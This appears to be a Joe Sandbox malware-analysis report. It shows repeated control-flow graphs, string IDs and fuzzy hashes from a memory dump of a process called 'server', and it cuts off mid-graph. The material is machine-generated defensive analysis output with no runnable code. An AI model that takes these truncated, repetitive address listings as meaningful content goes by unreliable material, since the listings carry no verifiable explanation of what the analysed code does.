3222->3231 3225->3210 3226->3210 3233 2fd4c3b-2fd4c3d 3226->3233 3229 2fd5125-2fd5139 3227->3229 3230 2fd50b0-2fd50d9 3227->3230 3228->3227 3238 2fd53ac-2fd53c0 3229->3238 3239 2fd513f-2fd535b 3229->3239 3230->3229 3231->3200 3233->3210 3242 2fd5496-2fd54aa 3238->3242 3243 2fd53c6-2fd53d6 3238->3243 3615 2fd535d 3239->3615 3616 2fd535f 3239->3616 3240->3213 3246 2fd5667-2fd567b 3242->3246 3247 2fd54b0-2fd55df 3242->3247 3676 2fd53dc call 3970606 3243->3676 3677 2fd53dc call 39705df 3243->3677 3252 2fd57de-2fd57f2 3246->3252 3253 2fd5681-2fd578c 3246->3253 3586 2fd55ea-2fd5620 3247->3586 3257 2fd57f8-2fd5903 3252->3257 3258 2fd5955-2fd5969 3252->3258 3532 2fd5797 3253->3532 3550 2fd590e 3257->3550 3262 2fd5acc-2fd5ae0 3258->3262 3263 2fd596f-2fd5a7a 3258->3263 3268 2fd5ae6-2fd5bf1 3262->3268 3269 2fd5c43-2fd5c57 3262->3269 3556 2fd5a85 3263->3556 3265 2fd53e2-2fd5448 3352 2fd544f 3265->3352 3572 2fd5bfc 3268->3572 3274 2fd5c5d-2fd5d68 3269->3274 3275 2fd5dba-2fd5dce 3269->3275 3580 2fd5d73 3274->3580 3285 2fd5dd4-2fd5edf 3275->3285 3286 2fd5f31-2fd5f45 3275->3286 3592 2fd5eea 3285->3592 3290 2fd60a8-2fd60bc 3286->3290 3291 2fd5f4b-2fd6061 3286->3291 3298 2fd621f-2fd6233 3290->3298 3299 2fd60c2-2fd61cd 3290->3299 3291->3290 3305 2fd6239-2fd6344 3298->3305 3306 2fd6396-2fd63aa 3298->3306 3610 2fd61d8 3299->3610 3621 2fd634f 3305->3621 3314 2fd652e-2fd6542 3306->3314 3315 2fd63b0-2fd63f5 call 2fd4270 3306->3315 3326 2fd6548-2fd6567 3314->3326 3327 2fd6685-2fd6699 3314->3327 3446 2fd64b5-2fd64d7 3315->3446 3362 2fd660c-2fd662e 3326->3362 3339 2fd669f-2fd679f 3327->3339 3340 2fd67e6-2fd67fa 3327->3340 3339->3340 3348 2fd6947-2fd695b 3340->3348 3349 2fd6800-2fd6900 3340->3349 3356 2fd6aa8-2fd6ad2 3348->3356 3357 2fd6961-2fd6a61 3348->3357 3349->3348 3352->3242 3388 2fd6ad8-2fd6b4b 3356->3388 3389 2fd6b92-2fd6ba6 3356->3389 3357->3356 3367 2fd656c-2fd657b 3362->3367 3368 2fd6634 3362->3368 3385 2fd6636 3367->3385 3386 2fd6581-2fd6585 3367->3386 3368->3327 3369->3189 3404 2fd663b-2fd6683 3385->3404 3410 2fd6590-2fd65b4 3386->3410 3388->3389 3392 2fd6bac-2fd6c03 3389->3392 3393 2fd6c83-2fd6c97 3389->3393 3523 2fd6c0a-2fd6c3c 3392->3523 3411 2fd6ddd-2fd6df1 3393->3411 3412 2fd6c9d-2fd6d96 3393->3412 3404->3327 3408->3196 3477 2fd65fb-2fd6604 3410->3477 3478 2fd65b6-2fd65f0 3410->3478 3420 2fd7054-2fd7068 3411->3420 3421 2fd6df7-2fd6e47 3411->3421 3412->3411 3430 2fd706e-2fd7109 call 2fd4270 * 2 3420->3430 3431 2fd7150-2fd7157 3420->3431 3533 2fd6e49-2fd6e6f 3421->3533 3534 2fd6eb5-2fd6ee0 3421->3534 3430->3431 3462 2fd64dd 3446->3462 3463 2fd63fa-2fd6409 3446->3463 3462->3314 3471 2fd64df 3463->3471 3472 2fd640f-2fd646f 3463->3472 3498 2fd64e4-2fd652c 3471->3498 3589 2fd6479-2fd64ad 3472->3589 3477->3404 3480 2fd6606 3477->3480 3478->3477 3480->3362 3498->3314 3523->3393 3532->3252 3608 2fd6e71-2fd6e91 3533->3608 3609 2fd6eb0 3533->3609 3613 2fd6fbe-2fd704f 3534->3613 3614 2fd6ee6-2fd6fb9 3534->3614 3550->3258 3556->3262 3572->3269 3580->3275 3586->3246 3589->3498 3607 2fd64af 3589->3607 3592->3286 3607->3446 3608->3609 3609->3420 3610->3298 3613->3420 3614->3420 3620 2fd5365 3615->3620 3616->3620 3620->3238 3621->3306 3668->3205 3676->3265 3677->3265
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3954461808
              • Opcode ID: b569e320df1f852f9c1a927691a6c4014f14c0b25fd78d4ee53af57ff18b96ee
              • Instruction ID: de1be9adc474b922f510a4916324e96e49b307e6ee9d737b7d23e6718b7915e4
              • Opcode Fuzzy Hash: b569e320df1f852f9c1a927691a6c4014f14c0b25fd78d4ee53af57ff18b96ee
              • Instruction Fuzzy Hash: 43F22874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 3678 2fd492e-2fd497b 3685 2fd497d-2fd4983 call 2fd4208 3678->3685 3686 2fd49ce-2fd49e2 3678->3686 3692 2fd4988-2fd4993 3685->3692 3687 2fd4a2a-2fd4a3e 3686->3687 3688 2fd49e4-2fd49ef 3686->3688 3690 2fd4b8c-2fd4ba0 3687->3690 3691 2fd4a44-2fd4b49 3687->3691 3688->3687 3693 2fd4ccc-2fd4ce0 3690->3693 3694 2fd4ba6-2fd4bba 3690->3694 3889 2fd4b51 3691->3889 3692->3686 3698 2fd4f6c-2fd4f80 3693->3698 3699 2fd4ce6-2fd4f1a 3693->3699 3696 2fd4bbc-2fd4bc3 3694->3696 3697 2fd4bc8-2fd4bdc 3694->3697 3702 2fd4c40-2fd4c54 3696->3702 3703 2fd4bde-2fd4be5 3697->3703 3704 2fd4be7-2fd4bfb 3697->3704 3705 2fd4fda-2fd4fee 3698->3705 3706 2fd4f82-2fd4f89 3698->3706 4149 2fd4f25 3699->4149 3713 2fd4c6e-2fd4c7a 3702->3713 3714 2fd4c56-2fd4c6c 3702->3714 3703->3702 3708 2fd4bfd-2fd4c04 3704->3708 3709 2fd4c06-2fd4c1a 3704->3709 3711 2fd503d-2fd5051 3705->3711 3712 2fd4ff0-2fd4ff6 3705->3712 3730 2fd4f93 3706->3730 3708->3702 3716 2fd4c1c-2fd4c23 3709->3716 3717 2fd4c25-2fd4c39 3709->3717 3718 2fd509a-2fd50ae 3711->3718 3719 2fd5053 3711->3719 3712->3711 3722 2fd4c85 3713->3722 3714->3722 3716->3702 3717->3702 3724 2fd4c3b-2fd4c3d 3717->3724 3720 2fd5125-2fd5139 3718->3720 3721 2fd50b0-2fd50d9 3718->3721 3719->3718 3728 2fd53ac-2fd53c0 3720->3728 3729 2fd513f-2fd535b 3720->3729 3721->3720 3722->3693 3724->3702 3732 2fd5496-2fd54aa 3728->3732 3733 2fd53c6-2fd53d6 3728->3733 4096 2fd535d 3729->4096 4097 2fd535f 3729->4097 3730->3705 3736 2fd5667-2fd567b 3732->3736 3737 2fd54b0-2fd55df 3732->3737 4157 2fd53dc call 3970606 3733->4157 4158 2fd53dc call 39705df 3733->4158 3741 2fd57de-2fd57f2 3736->3741 3742 2fd5681-2fd578c 3736->3742 4067 2fd55ea-2fd5620 3737->4067 3746 2fd57f8-2fd5903 3741->3746 3747 2fd5955-2fd5969 3741->3747 4013 2fd5797 3742->4013 4031 2fd590e 3746->4031 3750 2fd5acc-2fd5ae0 3747->3750 3751 2fd596f-2fd5a7a 3747->3751 3756 2fd5ae6-2fd5bf1 3750->3756 3757 2fd5c43-2fd5c57 3750->3757 4037 2fd5a85 3751->4037 3753 2fd53e2-2fd5448 3834 2fd544f 3753->3834 4053 2fd5bfc 3756->4053 3761 2fd5c5d-2fd5d68 3757->3761 3762 2fd5dba-2fd5dce 3757->3762 4061 2fd5d73 3761->4061 3771 2fd5dd4-2fd5edf 3762->3771 3772 2fd5f31-2fd5f45 3762->3772 4073 2fd5eea 3771->4073 3779 2fd60a8-2fd60bc 3772->3779 3780 2fd5f4b-2fd6061 3772->3780 3783 2fd621f-2fd6233 3779->3783 3784 2fd60c2-2fd61cd 3779->3784 3780->3779 3790 2fd6239-2fd6344 3783->3790 3791 2fd6396-2fd63aa 3783->3791 4091 2fd61d8 3784->4091 4102 2fd634f 3790->4102 3799 2fd652e-2fd6542 3791->3799 3800 2fd63b0-2fd63f5 call 2fd4270 3791->3800 3810 2fd6548-2fd6567 3799->3810 3811 2fd6685-2fd6699 3799->3811 3927 2fd64b5-2fd64d7 3800->3927 3844 2fd660c-2fd662e 3810->3844 3822 2fd669f-2fd679f 3811->3822 3823 2fd67e6-2fd67fa 3811->3823 3822->3823 3830 2fd6947-2fd695b 3823->3830 3831 2fd6800-2fd6900 3823->3831 3838 2fd6aa8-2fd6ad2 3830->3838 3839 2fd6961-2fd6a61 3830->3839 3831->3830 3834->3732 3869 2fd6ad8-2fd6b4b 3838->3869 3870 2fd6b92-2fd6ba6 3838->3870 3839->3838 3849 2fd656c-2fd657b 3844->3849 3850 2fd6634 3844->3850 3866 2fd6636 3849->3866 3867 2fd6581-2fd6585 3849->3867 3850->3811 3885 2fd663b-2fd6683 3866->3885 3891 2fd6590-2fd65b4 3867->3891 3869->3870 3873 2fd6bac-2fd6c03 3870->3873 3874 2fd6c83-2fd6c97 3870->3874 4004 2fd6c0a-2fd6c3c 3873->4004 3892 2fd6ddd-2fd6df1 3874->3892 3893 2fd6c9d-2fd6d96 3874->3893 3885->3811 3889->3690 3958 2fd65fb-2fd6604 3891->3958 3959 2fd65b6-2fd65f0 3891->3959 3901 2fd7054-2fd7068 3892->3901 3902 2fd6df7-2fd6e47 3892->3902 3893->3892 3911 2fd706e-2fd7109 call 2fd4270 * 2 3901->3911 3912 2fd7150-2fd7157 3901->3912 4014 2fd6e49-2fd6e6f 3902->4014 4015 2fd6eb5-2fd6ee0 3902->4015 3911->3912 3943 2fd64dd 3927->3943 3944 2fd63fa-2fd6409 3927->3944 3943->3799 3952 2fd64df 3944->3952 3953 2fd640f-2fd646f 3944->3953 3979 2fd64e4-2fd652c 3952->3979 4070 2fd6479-2fd64ad 3953->4070 3958->3885 3961 2fd6606 3958->3961 3959->3958 3961->3844 3979->3799 4004->3874 4013->3741 4089 2fd6e71-2fd6e91 4014->4089 4090 2fd6eb0 4014->4090 4094 2fd6fbe-2fd704f 4015->4094 4095 2fd6ee6-2fd6fb9 4015->4095 4031->3747 4037->3750 4053->3757 4061->3762 4067->3736 4070->3979 4088 2fd64af 4070->4088 4073->3772 4088->3927 4089->4090 4090->3901 4091->3783 4094->3901 4095->3901 4101 2fd5365 4096->4101 4097->4101 4101->3728 4102->3791 4149->3698 4157->3753 4158->3753
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3954461808
              • Opcode ID: 4eb9bae9d34f8f14f66137441f5b1731d18397a4b5c1c068a9b68262efdf46db
              • Instruction ID: a27de7d91f6769598acec0b6ee14bcfe36542f61bcef31e41d0d87235d7902a7
              • Opcode Fuzzy Hash: 4eb9bae9d34f8f14f66137441f5b1731d18397a4b5c1c068a9b68262efdf46db
              • Instruction Fuzzy Hash: C9F22874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 4159 2fd4995-2fd49e2 4166 2fd4a2a-2fd4a3e 4159->4166 4167 2fd49e4-2fd49ef 4159->4167 4168 2fd4b8c-2fd4ba0 4166->4168 4169 2fd4a44-2fd4b49 4166->4169 4167->4166 4170 2fd4ccc-2fd4ce0 4168->4170 4171 2fd4ba6-2fd4bba 4168->4171 4365 2fd4b51 4169->4365 4175 2fd4f6c-2fd4f80 4170->4175 4176 2fd4ce6-2fd4f1a 4170->4176 4173 2fd4bbc-2fd4bc3 4171->4173 4174 2fd4bc8-2fd4bdc 4171->4174 4178 2fd4c40-2fd4c54 4173->4178 4179 2fd4bde-2fd4be5 4174->4179 4180 2fd4be7-2fd4bfb 4174->4180 4181 2fd4fda-2fd4fee 4175->4181 4182 2fd4f82-2fd4f89 4175->4182 4625 2fd4f25 4176->4625 4189 2fd4c6e-2fd4c7a 4178->4189 4190 2fd4c56-2fd4c6c 4178->4190 4179->4178 4184 2fd4bfd-2fd4c04 4180->4184 4185 2fd4c06-2fd4c1a 4180->4185 4187 2fd503d-2fd5051 4181->4187 4188 2fd4ff0-2fd4ff6 4181->4188 4206 2fd4f93 4182->4206 4184->4178 4192 2fd4c1c-2fd4c23 4185->4192 4193 2fd4c25-2fd4c39 4185->4193 4194 2fd509a-2fd50ae 4187->4194 4195 2fd5053 4187->4195 4188->4187 4198 2fd4c85 4189->4198 4190->4198 4192->4178 4193->4178 4200 2fd4c3b-2fd4c3d 4193->4200 4196 2fd5125-2fd5139 4194->4196 4197 2fd50b0-2fd50d9 4194->4197 4195->4194 4204 2fd53ac-2fd53c0 4196->4204 4205 2fd513f-2fd535b 4196->4205 4197->4196 4198->4170 4200->4178 4208 2fd5496-2fd54aa 4204->4208 4209 2fd53c6-2fd53d6 4204->4209 4572 2fd535d 4205->4572 4573 2fd535f 4205->4573 4206->4181 4212 2fd5667-2fd567b 4208->4212 4213 2fd54b0-2fd55df 4208->4213 4633 2fd53dc call 3970606 4209->4633 4634 2fd53dc call 39705df 4209->4634 4217 2fd57de-2fd57f2 4212->4217 4218 2fd5681-2fd578c 4212->4218 4543 2fd55ea-2fd5620 4213->4543 4222 2fd57f8-2fd5903 4217->4222 4223 2fd5955-2fd5969 4217->4223 4489 2fd5797 4218->4489 4507 2fd590e 4222->4507 4226 2fd5acc-2fd5ae0 4223->4226 4227 2fd596f-2fd5a7a 4223->4227 4232 2fd5ae6-2fd5bf1 4226->4232 4233 2fd5c43-2fd5c57 4226->4233 4513 2fd5a85 4227->4513 4229 2fd53e2-2fd5448 4310 2fd544f 4229->4310 4529 2fd5bfc 4232->4529 4237 2fd5c5d-2fd5d68 4233->4237 4238 2fd5dba-2fd5dce 4233->4238 4537 2fd5d73 4237->4537 4247 2fd5dd4-2fd5edf 4238->4247 4248 2fd5f31-2fd5f45 4238->4248 4549 2fd5eea 4247->4549 4255 2fd60a8-2fd60bc 4248->4255 4256 2fd5f4b-2fd6061 4248->4256 4259 2fd621f-2fd6233 4255->4259 4260 2fd60c2-2fd61cd 4255->4260 4256->4255 4266 2fd6239-2fd6344 4259->4266 4267 2fd6396-2fd63aa 4259->4267 4567 2fd61d8 4260->4567 4578 2fd634f 4266->4578 4275 2fd652e-2fd6542 4267->4275 4276 2fd63b0-2fd63f5 call 2fd4270 4267->4276 4286 2fd6548-2fd6567 4275->4286 4287 2fd6685-2fd6699 4275->4287 4403 2fd64b5-2fd64d7 4276->4403 4320 2fd660c-2fd662e 4286->4320 4298 2fd669f-2fd679f 4287->4298 4299 2fd67e6-2fd67fa 4287->4299 4298->4299 4306 2fd6947-2fd695b 4299->4306 4307 2fd6800-2fd6900 4299->4307 4314 2fd6aa8-2fd6ad2 4306->4314 4315 2fd6961-2fd6a61 4306->4315 4307->4306 4310->4208 4345 2fd6ad8-2fd6b4b 4314->4345 4346 2fd6b92-2fd6ba6 4314->4346 4315->4314 4325 2fd656c-2fd657b 4320->4325 4326 2fd6634 4320->4326 4342 2fd6636 4325->4342 4343 2fd6581-2fd6585 4325->4343 4326->4287 4361 2fd663b-2fd6683 4342->4361 4367 2fd6590-2fd65b4 4343->4367 4345->4346 4349 2fd6bac-2fd6c03 4346->4349 4350 2fd6c83-2fd6c97 4346->4350 4480 2fd6c0a-2fd6c3c 4349->4480 4368 2fd6ddd-2fd6df1 4350->4368 4369 2fd6c9d-2fd6d96 4350->4369 4361->4287 4365->4168 4434 2fd65fb-2fd6604 4367->4434 4435 2fd65b6-2fd65f0 4367->4435 4377 2fd7054-2fd7068 4368->4377 4378 2fd6df7-2fd6e47 4368->4378 4369->4368 4387 2fd706e-2fd7109 call 2fd4270 * 2 4377->4387 4388 2fd7150-2fd7157 4377->4388 4490 2fd6e49-2fd6e6f 4378->4490 4491 2fd6eb5-2fd6ee0 4378->4491 4387->4388 4419 2fd64dd 4403->4419 4420 2fd63fa-2fd6409 4403->4420 4419->4275 4428 2fd64df 4420->4428 4429 2fd640f-2fd646f 4420->4429 4455 2fd64e4-2fd652c 4428->4455 4546 2fd6479-2fd64ad 4429->4546 4434->4361 4437 2fd6606 4434->4437 4435->4434 4437->4320 4455->4275 4480->4350 4489->4217 4565 2fd6e71-2fd6e91 4490->4565 4566 2fd6eb0 4490->4566 4570 2fd6fbe-2fd704f 4491->4570 4571 2fd6ee6-2fd6fb9 4491->4571 4507->4223 4513->4226 4529->4233 4537->4238 4543->4212 4546->4455 4564 2fd64af 4546->4564 4549->4248 4564->4403 4565->4566 4566->4377 4567->4259 4570->4377 4571->4377 4577 2fd5365 4572->4577 4573->4577 4577->4204 4578->4267 4625->4175 4633->4229 4634->4229
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3954461808
              • Opcode ID: 1eae425573403eeca7e776cc8cac98745821b61084a231381204eaacc28be9e9
              • Instruction ID: 0481aa4e1ae8b60d1100c7e5440bb733bc6530be41536cf9aac6239599afd7f8
              • Opcode Fuzzy Hash: 1eae425573403eeca7e776cc8cac98745821b61084a231381204eaacc28be9e9
              • Instruction Fuzzy Hash: 86F22874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 4635 2fd49f1-2fd4a3e 4642 2fd4b8c-2fd4ba0 4635->4642 4643 2fd4a44-2fd4b49 4635->4643 4644 2fd4ccc-2fd4ce0 4642->4644 4645 2fd4ba6-2fd4bba 4642->4645 4838 2fd4b51 4643->4838 4648 2fd4f6c-2fd4f80 4644->4648 4649 2fd4ce6-2fd4f1a 4644->4649 4646 2fd4bbc-2fd4bc3 4645->4646 4647 2fd4bc8-2fd4bdc 4645->4647 4651 2fd4c40-2fd4c54 4646->4651 4652 2fd4bde-2fd4be5 4647->4652 4653 2fd4be7-2fd4bfb 4647->4653 4654 2fd4fda-2fd4fee 4648->4654 4655 2fd4f82-2fd4f89 4648->4655 5098 2fd4f25 4649->5098 4662 2fd4c6e-2fd4c7a 4651->4662 4663 2fd4c56-2fd4c6c 4651->4663 4652->4651 4657 2fd4bfd-2fd4c04 4653->4657 4658 2fd4c06-2fd4c1a 4653->4658 4660 2fd503d-2fd5051 4654->4660 4661 2fd4ff0-2fd4ff6 4654->4661 4679 2fd4f93 4655->4679 4657->4651 4665 2fd4c1c-2fd4c23 4658->4665 4666 2fd4c25-2fd4c39 4658->4666 4667 2fd509a-2fd50ae 4660->4667 4668 2fd5053 4660->4668 4661->4660 4671 2fd4c85 4662->4671 4663->4671 4665->4651 4666->4651 4673 2fd4c3b-2fd4c3d 4666->4673 4669 2fd5125-2fd5139 4667->4669 4670 2fd50b0-2fd50d9 4667->4670 4668->4667 4677 2fd53ac-2fd53c0 4669->4677 4678 2fd513f-2fd535b 4669->4678 4670->4669 4671->4644 4673->4651 4681 2fd5496-2fd54aa 4677->4681 4682 2fd53c6-2fd53d6 4677->4682 5045 2fd535d 4678->5045 5046 2fd535f 4678->5046 4679->4654 4685 2fd5667-2fd567b 4681->4685 4686 2fd54b0-2fd55df 4681->4686 5106 2fd53dc call 3970606 4682->5106 5107 2fd53dc call 39705df 4682->5107 4690 2fd57de-2fd57f2 4685->4690 4691 2fd5681-2fd578c 4685->4691 5016 2fd55ea-2fd5620 4686->5016 4695 2fd57f8-2fd5903 4690->4695 4696 2fd5955-2fd5969 4690->4696 4962 2fd5797 4691->4962 4980 2fd590e 4695->4980 4699 2fd5acc-2fd5ae0 4696->4699 4700 2fd596f-2fd5a7a 4696->4700 4705 2fd5ae6-2fd5bf1 4699->4705 4706 2fd5c43-2fd5c57 4699->4706 4986 2fd5a85 4700->4986 4702 2fd53e2-2fd5448 4783 2fd544f 4702->4783 5002 2fd5bfc 4705->5002 4710 2fd5c5d-2fd5d68 4706->4710 4711 2fd5dba-2fd5dce 4706->4711 5010 2fd5d73 4710->5010 4720 2fd5dd4-2fd5edf 4711->4720 4721 2fd5f31-2fd5f45 4711->4721 5022 2fd5eea 4720->5022 4728 2fd60a8-2fd60bc 4721->4728 4729 2fd5f4b-2fd6061 4721->4729 4732 2fd621f-2fd6233 4728->4732 4733 2fd60c2-2fd61cd 4728->4733 4729->4728 4739 2fd6239-2fd6344 4732->4739 4740 2fd6396-2fd63aa 4732->4740 5040 2fd61d8 4733->5040 5051 2fd634f 4739->5051 4748 2fd652e-2fd6542 4740->4748 4749 2fd63b0-2fd63f5 call 2fd4270 4740->4749 4759 2fd6548-2fd6567 4748->4759 4760 2fd6685-2fd6699 4748->4760 4876 2fd64b5-2fd64d7 4749->4876 4793 2fd660c-2fd662e 4759->4793 4771 2fd669f-2fd679f 4760->4771 4772 2fd67e6-2fd67fa 4760->4772 4771->4772 4779 2fd6947-2fd695b 4772->4779 4780 2fd6800-2fd6900 4772->4780 4787 2fd6aa8-2fd6ad2 4779->4787 4788 2fd6961-2fd6a61 4779->4788 4780->4779 4783->4681 4818 2fd6ad8-2fd6b4b 4787->4818 4819 2fd6b92-2fd6ba6 4787->4819 4788->4787 4798 2fd656c-2fd657b 4793->4798 4799 2fd6634 4793->4799 4815 2fd6636 4798->4815 4816 2fd6581-2fd6585 4798->4816 4799->4760 4834 2fd663b-2fd6683 4815->4834 4840 2fd6590-2fd65b4 4816->4840 4818->4819 4822 2fd6bac-2fd6c03 4819->4822 4823 2fd6c83-2fd6c97 4819->4823 4953 2fd6c0a-2fd6c3c 4822->4953 4841 2fd6ddd-2fd6df1 4823->4841 4842 2fd6c9d-2fd6d96 4823->4842 4834->4760 4838->4642 4907 2fd65fb-2fd6604 4840->4907 4908 2fd65b6-2fd65f0 4840->4908 4850 2fd7054-2fd7068 4841->4850 4851 2fd6df7-2fd6e47 4841->4851 4842->4841 4860 2fd706e-2fd7109 call 2fd4270 * 2 4850->4860 4861 2fd7150-2fd7157 4850->4861 4963 2fd6e49-2fd6e6f 4851->4963 4964 2fd6eb5-2fd6ee0 4851->4964 4860->4861 4892 2fd64dd 4876->4892 4893 2fd63fa-2fd6409 4876->4893 4892->4748 4901 2fd64df 4893->4901 4902 2fd640f-2fd646f 4893->4902 4928 2fd64e4-2fd652c 4901->4928 5019 2fd6479-2fd64ad 4902->5019 4907->4834 4910 2fd6606 4907->4910 4908->4907 4910->4793 4928->4748 4953->4823 4962->4690 5038 2fd6e71-2fd6e91 4963->5038 5039 2fd6eb0 4963->5039 5043 2fd6fbe-2fd704f 4964->5043 5044 2fd6ee6-2fd6fb9 4964->5044 4980->4696 4986->4699 5002->4706 5010->4711 5016->4685 5019->4928 5037 2fd64af 5019->5037 5022->4721 5037->4876 5038->5039 5039->4850 5040->4732 5043->4850 5044->4850 5050 2fd5365 5045->5050 5046->5050 5050->4677 5051->4740 5098->4648 5106->4702 5107->4702
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3954461808
              • Opcode ID: 9a1e77f93b23f2f7c75e43309716864367516f5cea4a8ae8fae6e81f6fca7a45
              • Instruction ID: 3f333a8bb6bd5a1e483ca32d4561da27d1a2001d6b7800e6607c9d8fef8cd737
              • Opcode Fuzzy Hash: 9a1e77f93b23f2f7c75e43309716864367516f5cea4a8ae8fae6e81f6fca7a45
              • Instruction Fuzzy Hash: B9F22874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 5108 2fd4b53-2fd4ba0 5115 2fd4ccc-2fd4ce0 5108->5115 5116 2fd4ba6-2fd4bba 5108->5116 5119 2fd4f6c-2fd4f80 5115->5119 5120 2fd4ce6-2fd4f1a 5115->5120 5117 2fd4bbc-2fd4bc3 5116->5117 5118 2fd4bc8-2fd4bdc 5116->5118 5121 2fd4c40-2fd4c54 5117->5121 5122 2fd4bde-2fd4be5 5118->5122 5123 2fd4be7-2fd4bfb 5118->5123 5124 2fd4fda-2fd4fee 5119->5124 5125 2fd4f82-2fd4f89 5119->5125 5555 2fd4f25 5120->5555 5131 2fd4c6e-2fd4c7a 5121->5131 5132 2fd4c56-2fd4c6c 5121->5132 5122->5121 5127 2fd4bfd-2fd4c04 5123->5127 5128 2fd4c06-2fd4c1a 5123->5128 5129 2fd503d-2fd5051 5124->5129 5130 2fd4ff0-2fd4ff6 5124->5130 5147 2fd4f93 5125->5147 5127->5121 5134 2fd4c1c-2fd4c23 5128->5134 5135 2fd4c25-2fd4c39 5128->5135 5136 2fd509a-2fd50ae 5129->5136 5137 2fd5053 5129->5137 5130->5129 5140 2fd4c85 5131->5140 5132->5140 5134->5121 5135->5121 5142 2fd4c3b-2fd4c3d 5135->5142 5138 2fd5125-2fd5139 5136->5138 5139 2fd50b0-2fd50d9 5136->5139 5137->5136 5145 2fd53ac-2fd53c0 5138->5145 5146 2fd513f-2fd535b 5138->5146 5139->5138 5140->5115 5142->5121 5149 2fd5496-2fd54aa 5145->5149 5150 2fd53c6-2fd53d6 5145->5150 5502 2fd535d 5146->5502 5503 2fd535f 5146->5503 5147->5124 5152 2fd5667-2fd567b 5149->5152 5153 2fd54b0-2fd55df 5149->5153 5563 2fd53dc call 3970606 5150->5563 5564 2fd53dc call 39705df 5150->5564 5157 2fd57de-2fd57f2 5152->5157 5158 2fd5681-2fd578c 5152->5158 5473 2fd55ea-2fd5620 5153->5473 5161 2fd57f8-2fd5903 5157->5161 5162 2fd5955-2fd5969 5157->5162 5419 2fd5797 5158->5419 5437 2fd590e 5161->5437 5164 2fd5acc-2fd5ae0 5162->5164 5165 2fd596f-2fd5a7a 5162->5165 5170 2fd5ae6-2fd5bf1 5164->5170 5171 2fd5c43-2fd5c57 5164->5171 5443 2fd5a85 5165->5443 5167 2fd53e2-2fd5448 5243 2fd544f 5167->5243 5459 2fd5bfc 5170->5459 5175 2fd5c5d-2fd5d68 5171->5175 5176 2fd5dba-2fd5dce 5171->5176 5467 2fd5d73 5175->5467 5184 2fd5dd4-2fd5edf 5176->5184 5185 2fd5f31-2fd5f45 5176->5185 5479 2fd5eea 5184->5479 5191 2fd60a8-2fd60bc 5185->5191 5192 2fd5f4b-2fd6061 5185->5192 5196 2fd621f-2fd6233 5191->5196 5197 2fd60c2-2fd61cd 5191->5197 5192->5191 5202 2fd6239-2fd6344 5196->5202 5203 2fd6396-2fd63aa 5196->5203 5497 2fd61d8 5197->5497 5508 2fd634f 5202->5508 5210 2fd652e-2fd6542 5203->5210 5211 2fd63b0-2fd63f5 call 2fd4270 5203->5211 5220 2fd6548-2fd6567 5210->5220 5221 2fd6685-2fd6699 5210->5221 5333 2fd64b5-2fd64d7 5211->5333 5253 2fd660c-2fd662e 5220->5253 5232 2fd669f-2fd679f 5221->5232 5233 2fd67e6-2fd67fa 5221->5233 5232->5233 5239 2fd6947-2fd695b 5233->5239 5240 2fd6800-2fd6900 5233->5240 5247 2fd6aa8-2fd6ad2 5239->5247 5248 2fd6961-2fd6a61 5239->5248 5240->5239 5243->5149 5276 2fd6ad8-2fd6b4b 5247->5276 5277 2fd6b92-2fd6ba6 5247->5277 5248->5247 5258 2fd656c-2fd657b 5253->5258 5259 2fd6634 5253->5259 5273 2fd6636 5258->5273 5274 2fd6581-2fd6585 5258->5274 5259->5221 5292 2fd663b-2fd6683 5273->5292 5297 2fd6590-2fd65b4 5274->5297 5276->5277 5280 2fd6bac-2fd6c03 5277->5280 5281 2fd6c83-2fd6c97 5277->5281 5410 2fd6c0a-2fd6c3c 5280->5410 5298 2fd6ddd-2fd6df1 5281->5298 5299 2fd6c9d-2fd6d96 5281->5299 5292->5221 5364 2fd65fb-2fd6604 5297->5364 5365 2fd65b6-2fd65f0 5297->5365 5307 2fd7054-2fd7068 5298->5307 5308 2fd6df7-2fd6e47 5298->5308 5299->5298 5317 2fd706e-2fd7109 call 2fd4270 * 2 5307->5317 5318 2fd7150-2fd7157 5307->5318 5420 2fd6e49-2fd6e6f 5308->5420 5421 2fd6eb5-2fd6ee0 5308->5421 5317->5318 5349 2fd64dd 5333->5349 5350 2fd63fa-2fd6409 5333->5350 5349->5210 5358 2fd64df 5350->5358 5359 2fd640f-2fd646f 5350->5359 5385 2fd64e4-2fd652c 5358->5385 5476 2fd6479-2fd64ad 5359->5476 5364->5292 5367 2fd6606 5364->5367 5365->5364 5367->5253 5385->5210 5410->5281 5419->5157 5495 2fd6e71-2fd6e91 5420->5495 5496 2fd6eb0 5420->5496 5500 2fd6fbe-2fd704f 5421->5500 5501 